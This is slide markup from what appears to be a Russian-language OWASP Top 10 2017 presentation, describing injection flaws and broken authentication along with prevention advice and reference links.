                <a:spcPts val="2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20"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>wigger: Server-side template injection</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ru-RU" sz="90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r>
              <a:rPr lang="ru-RU"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Even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Use positive or "whitelist" server-side input validation.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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A1</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459229983"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836272" cy="2101908"/>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Exploitability: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Prevalence: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Detectability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> occur when an attacker can send hostile data to an interpreter.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atin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.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900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the needs of the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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There may be authentication weaknesses if the application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permits automated attacks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permits brute force or other automated attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Uses plain text, encrypted, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or weakly hashed passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="90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charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="90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8"/>
              </a:rPr>
              <a:t>OWASP ASVS: V2 Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>V3 Session Management</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0"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Authentication</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2"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Authentication</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3"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Credential Stuffing</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4"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Forgot Password</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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Session Management</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5"/>
              </a:rPr>
              <a:t>OWASP Automated Threats Handbook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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6"/>
              </a:rPr>
              <a:t>NIST 800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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7"/>
              </a:rPr>
              <a:t>CWE-287: Improper Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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8"/>
              </a:rPr>
              <a:t>CWE-384: Session Fixation</a:t>
            </a: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ru-RU" sz="90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ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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 other attacks are detected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use a server-side, secure,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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A2</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35431733"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="21024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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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Prevalence: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Detectability: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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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manage-ment is the bedrock of authentication and access controls, and is present in all stateful </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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90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ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>attacks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a: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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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A0A0A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A0A0A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12011</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1295</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PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Содержание</vt:lpstr>
      <vt:lpstr>Предисловие</vt:lpstr>
      <vt:lpstr>Введение</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Evgeny Zudilin</cp:lastModifiedBy>
  <cp:revision>1876</cp:revision>
  <cp:lastPrinted>2017-12-15T07:04:05Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-19T10:58:26Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>